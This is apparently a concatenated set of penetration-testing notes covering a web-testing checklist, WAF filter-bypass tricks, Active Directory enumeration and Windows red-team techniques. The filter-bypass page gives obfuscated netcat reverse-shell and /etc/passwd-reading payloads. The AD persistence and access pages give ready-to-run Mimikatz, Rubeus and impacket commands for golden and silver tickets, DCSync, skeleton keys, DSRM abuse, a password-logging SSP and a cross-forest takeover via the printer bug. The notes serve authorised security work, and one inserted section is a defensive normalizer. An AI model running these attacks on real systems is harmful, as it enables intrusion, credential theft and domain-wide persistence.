* [ ] Test for reflected XSS
* [ ] Test for HTTP header injection
* [ ] Test for arbitrary redirection
* [ ] Test for stored attacks
* [ ] Test for OS command injection
* [ ] Test for path traversal
* [ ] Test for script injection
* [ ] Test for file inclusion
* [ ] Test for SMTP injection
* [ ] Test for native software flaws (buffer overflow, integer bugs, format strings)
* [ ] Test for SOAP injection
* [ ] Test for LDAP injection
* [ ] Test for XPath injection

### Test application logic

* [ ] Identify the logic attack surface
* [ ] Test transmission of data via the client
* [ ] Test for reliance on client-side input validation
* [ ] Test any thick-client components (Java, ActiveX, Flash)
* [ ] Test multi-stage processes for logic flaws
* [ ] Test handling of incomplete input
* [ ] Test trust boundaries
* [ ] Test transaction logic

### Assess application hosting

* [ ] Test segregation in shared infrastructures
* [ ] Test segregation between ASP-hosted applications
* [ ] Test for web server vulnerabilities
  * [ ] Default credentials
  * [ ] Default content
  * [ ] Dangerous HTTP methods
  * [ ] Proxy functionality
  * [ ] Virtual hosting misconfiguration
  * [ ] Bugs in web server software

### Miscellaneous tests

* [ ] Check for DOM-based attacks
* [ ] Check for frame injection
* [ ] Check for local privacy vulnerabilities
  * [ ] Persistent cookies
  * [ ] Caching
  * [ ] Sensitive data in URL parameters
  * [ ] Forms with autocomplete enabled
* [ ] Follow up any information leakage
* [ ] Check for weak SSL ciphers

## References

* [https://portswigger.net/web-security](https://portswigger.net/web-security)
* [https://gist.github.com/jhaddix/6b777fb004768b388fefadf9175982ab](https://gist.github.com/jhaddix/6b777fb004768b388fefadf9175982ab)

If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!

--------------------------------------------------------------------------------
/web/web-notes/web-filter-bypass.md:
--------------------------------------------------------------------------------

# Web Filter Bypass

## Payloads and Bypass Methods for Web Filtering

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings" %}
swisskyrepo / PayloadsAllTheThings
{% endembed %}

{% embed url="https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf/" %}
How To Exploit PHP Remotely To Bypass Filters & WAF Rules
{% endembed %}

### Use Uninitialized Shell Variables to Bypass Filters

{% embed url="https://www.secjuice.com/web-application-firewall-waf-evasion/" %}
Web Application Firewall (WAF) Evasion Techniques #3
{% endembed %}

Uninitialized shell variables can be used to bypass web application firewalls (WAF), because the shell expands an unset variable to an empty string while the filter still sees the variable name. Example: bypassing a filter to execute a reverse shell - `nc$u -e /bin$u/bash$u`. If this doesn't work, try adding spaces before and after the variable (note the `+`'s; this example is also URL encoded): `nc+$u++-e+/bin$u/bash$u` _(`$u` in this case is a random attacker-picked variable that would hopefully be uninitialized on the target)._

### Use Wildcards to Bypass Filters

{% embed url="https://medium.com/secjuice/waf-evasion-techniques-718026d693d8" %}
Web Application Firewall (WAF) Evasion Techniques
{% endembed %}

Bypass web filters by using bash wildcards such as `/???/?s`. For example, `/?cmd=%2f???%2f??t%20%2f???%2fp??s??` will bypass the filter and execute every command that matches the pattern, such as `/bin/cat /etc/apt` and `/bin/cat /etc/passwd`.

Netcat firewall bypass: `/???/n? -e /???/b??h 2130706433 1337` (`/???/?c.??????????? -e /???/b??h 2130706433 1337` for nc traditional).

```
Standard: /bin/nc 127.0.0.1 1337
Evasion: /???/n? 2130706433 1337
Used chars: / ? n [0-9]

Standard: /bin/cat /etc/passwd
Evasion: /???/??t /???/??ss??
Used chars: / ? t s
```

### Use String Concatenation to Bypass Filters

```
$ /bin/cat /etc/passwd
$ /bin/cat /e'tc'/pa'ss'wd
$ /bin/c'at' /e'tc'/pa'ss'wd
$ /b'i'n/c'a't /e't'c/p'a's's'w'd'
Can use \\ instead of ' as well
```

### Convert IP Address to Other Formats

* [https://h.43z.one/ipconverter/](https://h.43z.one/ipconverter/)

An IP address converted to another format, such as decimal, is still understood by most programs and languages, and avoids the `.` character in filtered HTTP requests: `127.0.0.1 = 2130706433`

```
http://127.0.0.1

#0 Concatenation
http://127.0.1
http://127.1

#Decimal
http://2130706433

#Hexadecimal
http://0x7f000001

#Dotted Hexadecimal
http://0x7f.0x0.0x0.0x1
http://0x7f.0x000001
http://0x7f.0x0.00x0001

#Others (need descriptions)
http://0177.00.00.01
http://000000177.0000000.000000000.0001
http://017700000001
http://%31%32%37%2e%30%2e%30%2e%31
http://127.0x0.000000000.0x1
http://①②⑦.⓪.⓪.①
```

Injecting IPs when `.` is disallowed: convert dotted-decimal format to decimal value - [`ip2dh`](https://github.com/4ndr34z/MyScripts/blob/master/ip2dh.py)

### LFI / RFI by Bypassing Filters Using Wrappers

From [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/73aa26ba6891981ec2254907b9bbd4afdc745e1d/File%20Inclusion/README.md#lfi--rfi-using-wrappers): `php://filter/` offers multiple ways to bypass PHP input filters. Filters can be chained with `|` or `/`, and other wrappers (zip, data, expect, input, phar, and many more) are worth trying as well.
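Added defender-side example in Python (not code from the original notes or the linked articles) covering the wildcard, uninitialized-variable, string-concatenation and IP-format sections above: it canonicalizes a request fragment the way bash would (percent/`+` decoding, quote and backslash removal, unset `$u` expansion, glob expansion against a constructed sample listing) and folds every IP spelling listed above back to dotted-decimal, so a filter or SSRF allowlist compares against the real target instead of the obfuscated text. `SAMPLE_LISTING`, `SHELL_TOOLS` and the function names are assumptions of this example.

```python
"""Canonicalize obfuscated request fragments before matching a filter.

Added defender-side example, not code from the original notes. The wildcard,
quote-concatenation, unset-variable and IP-spelling tricks above all defeat a
filter that matches raw request text, so normalize first and match afterwards.
"""
import re
import shlex
import unicodedata
from fnmatch import fnmatchcase
from ipaddress import IPv4Address
from urllib.parse import unquote_plus

# Constructed stand-in for the target filesystem: globs need something to match.
SAMPLE_LISTING = ["/bin/bash", "/bin/cat", "/bin/ls", "/bin/nc", "/bin/ps",
                  "/etc/apt", "/etc/passwd", "/etc/shadow"]
SHELL_TOOLS = {"bash", "cat", "nc", "sh"}   # basenames the filter is looking for
_VAR = re.compile(r"\$(\w+|\{\w+\})")       # $u or ${u}


def _glob(pattern, listing):
    """Shell-style glob over a listing: match per component, so '?' never spans '/'."""
    want = pattern.split("/")
    return sorted(p for p in listing if len(p.split("/")) == len(want)
                  and all(fnmatchcase(c, w) for c, w in zip(p.split("/"), want)))


def canonical_shell(fragment, env=None, listing=SAMPLE_LISTING):
    """Return the words bash would actually run for an obfuscated fragment.

    Handles '+'/percent encoding, quote and backslash concatenation
    (/e'tc'/pa'ss'wd), unset variables (nc$u) and wildcards (/???/??t).
    """
    env = env or {}
    # An unset variable expands to the empty string, exactly as in bash.
    text = _VAR.sub(lambda m: env.get(m.group(1).strip("{}"), ""),
                    unquote_plus(fragment))
    try:
        tokens = shlex.split(text)         # quote and backslash removal
    except ValueError:                     # unbalanced quotes: bash rejects it too
        tokens = text.split()
    words = []
    for tok in tokens:
        if not tok:
            continue                       # an empty expansion vanishes
        if any(ch in tok for ch in "?*["):
            words.extend(_glob(tok, listing) or [tok])   # no match: literal stays
        else:
            words.append(tok)
    return words


def looks_like_shell(fragment, **kw):
    """True when the canonical form names one of SHELL_TOOLS anywhere."""
    return any(w.rsplit("/", 1)[-1] in SHELL_TOOLS
               for w in canonical_shell(fragment, **kw))


def _ascii_digits(text):
    """Map non-ASCII digit forms such as ①②⑦ and ⓪ onto ASCII digits."""
    out = []
    for ch in text:
        val = unicodedata.numeric(ch, None) if ord(ch) > 127 else None
        out.append(str(int(val)) if val is not None and val.is_integer()
                   and 0 <= val <= 9 else ch)
    return "".join(out)


_DIGITS = {16: "0123456789abcdefABCDEF", 8: "01234567", 10: "0123456789"}


def _ipv4_part(part):
    """Parse one dotted component by inet_aton rules: 0x is hex, leading 0 is octal."""
    if part[:2].lower() == "0x":
        digits, base = part[2:], 16
    elif len(part) > 1 and part[0] == "0":
        digits, base = part[1:], 8
    else:
        digits, base = part, 10
    if not digits or any(c not in _DIGITS[base] for c in digits):
        return None
    return int(digits, base)


def normalize_ipv4(literal):
    """Dotted-decimal for any inet_aton-style spelling of an IPv4 address, else None."""
    parts = _ascii_digits(unquote_plus(literal.strip())).split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_ipv4_part(p) for p in parts]
    if any(v is None for v in values):
        return None
    *lead, last = values
    tail_bits = 8 * (5 - len(values))      # the last part fills the remaining bytes
    if any(v > 255 for v in lead) or last >= 1 << tail_bits:
        return None
    number = last
    for i, v in enumerate(reversed(lead)):
        number |= v << (tail_bits + 8 * i)
    return str(IPv4Address(number))


def is_internal_target(literal):
    """SSRF-style check: reject any spelling that lands in loopback or private space."""
    ip = normalize_ipv4(literal)
    return ip is not None and (IPv4Address(ip).is_loopback or IPv4Address(ip).is_private)
```

Spellings that standard parsers reject (for example, a part with characters that are neither hex nor octal digits) come back as `None`, which a filter should treat as "reject", not "allow".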

An example of a chained `php://filter` payload:

```php
/zlib.deflate/read=string.rot13/convert.base64-encode/convert.iconv.utf-8.utf-16/resource=
```

--------------------------------------------------------------------------------
/windows-1/active-directory.md:
--------------------------------------------------------------------------------

# Active Directory

## Get Domain Information

```
nltest /DCLIST:DomainName
nltest /DCNAME:DomainName
nltest /DSGETDC:DomainName
```

### Get Current Domain Info - Similar to Get-Domain

```powershell
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
```

### View Domain Forest Info

```powershell
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
```

### View Domain Trust Information

#### Using PowerShell

```powershell
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()
```

#### Using CMD.exe

```
nltest /domain_trusts

nltest [server:] /domain_trusts /all_trusts /v

nltest /dsgetfti:

nltest /server: /domain_trusts /all_trusts
```

### View All Domain Controllers

```
nltest /dclist:$domainFQDN
net group "domain controllers" /domain
```

### View DC for Current Session

```
nltest /dsgetdc:$domainFQDN
```

## Kerberos

### Get domain name and DC the user authenticated to

```
klist
```

### Get All Logged on Sessions, Includes NTLM & Kerberos

```
klist sessions
```

### View Current Kerberos Tickets

```
klist
```

### View Cached Krbtgt

```
klist tgt
```

## User Enumeration

### Get User-related Environment Variables (cmd.exe)

```
set u
```

### List all Usernames

```powershell
([adsisearcher]"(&(objectClass=User)(samaccountname=*))").FindAll().Properties.samaccountname
```

### List Administrators

```powershell
([adsisearcher]"(&(objectClass=User)(admincount=1))").FindAll().Properties.samaccountname
```

### List all Info about Specific User

#### Using PowerShell

```powershell
([adsisearcher]"(&(objectClass=User)(samaccountname=))").FindAll().Properties
```

#### Using CMD.exe

```
nltest /user:"zweilos"
```

### View All Users with Description Field Set

```powershell
# Filter on user objects (not groups) and only return those that actually have a description
([adsisearcher]"(&(objectClass=user)(description=*))").FindAll().Properties | % { Write-Host $_.samaccountname : $_.description }
```

--------------------------------------------------------------------------------
/windows-1/hardening-and-setup.md:
--------------------------------------------------------------------------------

---
description: >-
  A collection of useful programs and configurations for getting your home box
  set up for pre-engagement use. I think I want to rename this page to something
  else...can't think of a good title right now
---

# Hardening & Setup

## Hardening the OS

### Disable unused services

Disable WinRM, RDP, etc. if not used.

### Reduce Privacy Disclosures

Disable location, telemetry, etc.

## Recommended Programs

{% embed url="https://ninite.com" %}

notepad++

Visual Studio Code

Tor Browser - based on Firefox. Be careful of settings and extensions used, as these can break the protection provided by the VPN.

--------------------------------------------------------------------------------
/windows-1/windows-hardening.md:
--------------------------------------------------------------------------------

---
description: >-
  A collection of useful programs and configurations for getting your home box
  set up for pre-engagement use. I think I want to rename this page to something
  else...can't think of a good title right now
---

# Hardening & Setup

{% hint style="danger" %}
Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes).
{% endhint %}

## Hardening the OS

### Disable unused services

Disable WinRM, RDP, etc. if not used.

### Reduce Privacy Disclosures

Disable location, telemetry, etc.

## Recommended Programs

{% embed url="https://ninite.com" %}

* [notepad++](https://notepad-plus-plus.org/)
* [Visual Studio Code](https://code.visualstudio.com/)
* [Tor Browser](https://www.torproject.org/)
  * Based on Firefox. Be careful of settings and extensions used, as these can break the protection provided by the VPN.

--------------------------------------------------------------------------------
/windows-1/windows-redteam/README.md:
--------------------------------------------------------------------------------

---
description: 'Sorted Linux notes, need to separate to different pages and reorganize'
---

# Red Team Notes

Living off the land binaries: [LOLBAS](https://lolbas-project.github.io/)

## Enumeration

Windows Privilege Escalation Enumeration Script: [WinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)

A little bit of everything: [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/)

## Shares

### Mounting NFS Shares Remotely

{% embed url="https://resources.infosecinstitute.com/exploiting-nfs-share/" %}

```text
# List the exports offered by the server
showmount -e $ip

# Mount one export locally ($ip and $share are placeholders; the mount line was
# restored from context, the original's placeholders were lost in extraction)
mkdir /tmp/$share
mount -t nfs $ip:/$share /tmp/$share
```

### Using `smbmount`

```text
smbmount //$IP/$share /mnt/remote/ -o username=$user,password=$pass,rw
```

Where `/mnt/remote` is the local folder to mount the share to.

## Unsorted

Netcat reverse shell (after uploading the binary!): `nc64.exe -e cmd `

5KFB6 tools: [https://specterops.io/resources/research-and-development](https://specterops.io/resources/research-and-development)

Easy Windows shell: unicorn.py [trustedsec/unicorn](https://github.com/trustedsec/unicorn) [HackTheBox - Arctic](https://www.youtube.com/watch?v=e9lVyFH7-4o)

System information: `sysinfo`

Get user id: `getuid`

PowerShell privilege escalation:

* [PowerUp.ps1](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1) from PowerShellEmpire
* Sherlock.ps1

[fuzzbunch](https://github.com/peterpt/fuzzbunch): exploit tool similar to Metasploit

Check what updates are installed: `type WindowsUpdate.log`

Net use share from Linux [like SimpleHTTPServer for Samba]: `impacket-smbserver ''`

--------------------------------------------------------------------------------
/windows-1/windows-redteam/active-directory/README.md:
--------------------------------------------------------------------------------

---
description: Active Directory-Specific commands and strategies
---

# Active Directory

## Table of Contents

### [Enumeration](enumeration.md)

### [Getting Access](getting-access.md)

### [Privilege Escalation](privilege-escalation.md)

### [Persistence](persistence.md)

## Tools

* [Powersploit](https://github.com/PowerShellMafia/PowerSploit/tree/dev)
* [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL)
* [Powermad](https://github.com/Kevin-Robertson/Powermad)
* [Impacket](https://github.com/SecureAuthCorp/impacket)
* [Mimikatz](https://github.com/gentilkiwi/mimikatz)
* [Rubeus](https://github.com/GhostPack/Rubeus) -> [Compiled Version](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries)
* [BloodHound](https://github.com/BloodHoundAD/BloodHound)
* [AD Module](https://github.com/samratashok/ADModule)
* [ASREPRoast](https://github.com/HarmJ0y/ASREPRoast)

--------------------------------------------------------------------------------
/windows-1/windows-redteam/active-directory/getting-access.md:
--------------------------------------------------------------------------------

# Getting Access

{% hint style="success" %}
**Hack Responsibly.**

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

## Lateral Movement

### PowerShell Remoting

```powershell
#Enable PowerShell Remoting on the current machine (needs admin access)
Enable-PSRemoting

#Entering or starting a new PSSession (needs admin access)
$sess = New-PSSession -ComputerName $ComputerName
Enter-PSSession -ComputerName $ComputerName
#-OR- enter the session object created above
Enter-PSSession -Session $sess
```

### Remote Code Execution with PS Credentials

```powershell
#Build a credential object from the variables (double quotes so they expand)
$SecPassword = ConvertTo-SecureString $Password -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential("$DomainName\$User", $SecPassword)
Invoke-Command -ComputerName $ComputerName -Credential $Cred -ScriptBlock {whoami /all}
```

### Import a PowerShell module and execute its functions remotely

```powershell
#Create a session with the credentials, then run the module file inside it
$sess = New-PSSession -ComputerName $ComputerName -Credential $cred
Invoke-Command -Session $sess -FilePath $PSModule_FilePath

#Interact with the session (the module's functions are now loaded there)
Enter-PSSession -Session $sess
```

### Executing Remote Stateful commands

```powershell
#Create a new session
$sess = New-PSSession -ComputerName $ComputerName

#Execute command on the session
Invoke-Command -Session $sess -ScriptBlock {$ps = Get-Process}

#Check the result of the command to confirm we have a stateful session
Invoke-Command -Session $sess -ScriptBlock {$ps}
```

### Useful Tools

* [Powercat](https://github.com/besimorhino/powercat) - netcat written in PowerShell; provides tunneling, relay and port forwarding capabilities.
* [SCShell](https://github.com/Mr-Un1k0d3r/SCShell) - fileless lateral movement tool that relies on ChangeServiceConfigA to run commands
* [Evil-Winrm](https://github.com/Hackplayers/evil-winrm) - the ultimate WinRM shell for hacking/pentesting
* [RunasCs](https://github.com/antonioCoco/RunasCs) - C# and open version of the Windows built-in runas.exe

--------------------------------------------------------------------------------
/windows-1/windows-redteam/active-directory/persistence.md:
--------------------------------------------------------------------------------

# Persistence

{% hint style="success" %}
**Hack Responsibly.**

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

## Domain Persistence

### Golden Ticket Attack

```powershell
#Execute mimikatz on DC as DA to grab krbtgt hash:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName

#On any machine:
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain: /sid: /krbtgt: /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
```

### DCsync Attack

```
#DCsync using mimikatz (you need DA rights or the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges):
Invoke-Mimikatz -Command '"lsadump::dcsync /user:\"'

#DCsync using secretsdump.py from impacket with NTLM authentication
secretsdump.py /:@ -just-dc-ntlm

#DCsync using secretsdump.py from impacket with Kerberos authentication
secretsdump.py -no-pass -k /@ -just-dc-ntlm
```

**Tip:**\
/ptt -> inject ticket on current running session\
/ticket -> save the ticket on the system for later use

### Silver Ticket Attack

```powershell
Invoke-Mimikatz -Command '"kerberos::golden /domain: /sid: /target: /service: /rc4: /user: /ptt"'
```

[SPN List](https://adsecurity.org/?page_id=183)

### Skeleton Key Attack

```powershell
#Exploitation command, run as DA:
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName $DC_hostname

#Access using the password "mimikatz"
Enter-PSSession -ComputerName $ComputerName -Credential $Domain\$UserName
```

### DSRM Abuse

_Every DC has a local Administrator account; this account has the DSRM password, which is a SafeBackupPassword. We can get this and then PTH its NTLM hash to get local Administrator access to the DC!_

```powershell
#Dump DSRM password (needs DA privs):
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName $DC_hostname

#This is a local account, so we can PTH and authenticate!
#BUT we need to alter the behaviour of the DSRM account before PTH:
#Connect on DC:
Enter-PSSession -ComputerName $DC_hostname

#Alter the logon behaviour in the registry (the value name is DsrmAdminLogonBehavior):
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD -Verbose

#If the property already exists:
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -Verbose
```

Then just PTH to get local admin access on the DC!

### Custom SSP

_We can set our own SSP by dropping a custom DLL, for example mimilib.dll from mimikatz, that will monitor and capture plaintext passwords from users that log on!_

From PowerShell:

```powershell
#Get current Security Packages:
$packages = Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' | select -ExpandProperty 'Security Packages'

#Append mimilib:
$packages += "mimilib"

#Write the new package list back to both keys
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' -Value $packages
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name 'Security Packages' -Value $packages

#ALTERNATIVE:
Invoke-Mimikatz -Command '"misc::memssp"'
```

Now all logons on the DC are logged to -> C:\Windows\System32\kiwissp.log

## Cross Forest Attacks

### Trust Tickets

_If we have Domain Admin rights on a domain that has a bidirectional trust relationship with another forest, we can get the trust key and forge our own inter-realm TGT._

⚠️ The access we will have will be limited to what our DA account is configured to have on the other forest!

#### Using Mimikatz:

```powershell
#Dump the trust key
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

#Forge an inter-realm TGT using the Golden Ticket attack
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain: /sid: /rc4: /service:krbtgt /target: /ticket:"'
```

❗ Tickets -> .kirbi format

Then ask for a TGS to the external forest for any service using the inter-realm TGT and access the resource!

#### Using Rubeus:

```
.\Rubeus.exe asktgs /ticket: /service:"Service's SPN" /ptt
```

### Abuse MSSQL Servers

* Enumerate MSSQL Instances: `Get-SQLInstanceDomain`
* Check accessibility as current user:

```powershell
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
```

* Gather information about the instance: `Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose`
* Abusing SQL Database Links: _A database link allows a SQL Server to access other resources, such as another SQL Server. If we have two linked SQL Servers we can execute stored procedures in them. Database links also work across forest trusts!_

Check for existing database links:

```
#Check for existing Database Links:
#PowerUpSQL:
Get-SQLServerLink -Instance -Verbose

#MSSQL Query:
select * from master..sysservers
```

Then we can use queries to enumerate other links from the linked database:

```
#Manually:
select * from openquery("LinkedDatabase", 'select * from master..sysservers')

#PowerUpSQL (will enumerate every link across forests and child domains of the forests):
Get-SQLServerLinkCrawl -Instance -Verbose

#Then we can execute commands on the machines where the SQL service runs using xp_cmdshell
#Or if it is disabled, enable it:
EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;') AT "SPN"
```

Query execution:

```
Get-SQLServerLinkCrawl -Instance -Query "exec master..xp_cmdshell 'whoami'"
```

### Breaking Forest Trusts

_If we have a bidirectional trust with an external forest and we manage to compromise a machine on the local forest that has unconstrained delegation enabled (DCs have this by default), we can use the printerbug to force the DC of the external forest's root domain to authenticate to us. Then we can capture its TGT, inject it into memory and DCsync to dump its hashes, giving us complete access over the whole forest._

Tools we are going to use:

* [Rubeus](https://github.com/GhostPack/Rubeus)
* [SpoolSample](https://github.com/leechristensen/SpoolSample)
* [Mimikatz](https://github.com/gentilkiwi/mimikatz)

Exploitation example:

```
#Start monitoring for TGTs with Rubeus:
Rubeus.exe monitor /interval:5 /filteruser:target-dc$

#Execute the printerbug to trigger the forced authentication of the target DC to our machine
SpoolSample.exe target-dc$.external.forest.local dc.compromised.domain.local

#Get the base64 captured TGT from Rubeus and inject it into memory:
Rubeus.exe ptt /ticket:

#Dump the hashes of the target domain using mimikatz:
lsadump::dcsync /domain:external.forest.local /all
```

Detailed Articles:

* [Not A Security Boundary: Breaking Forest Trusts](https://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-trusts/)
* [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1)
--------------------------------------------------------------------------------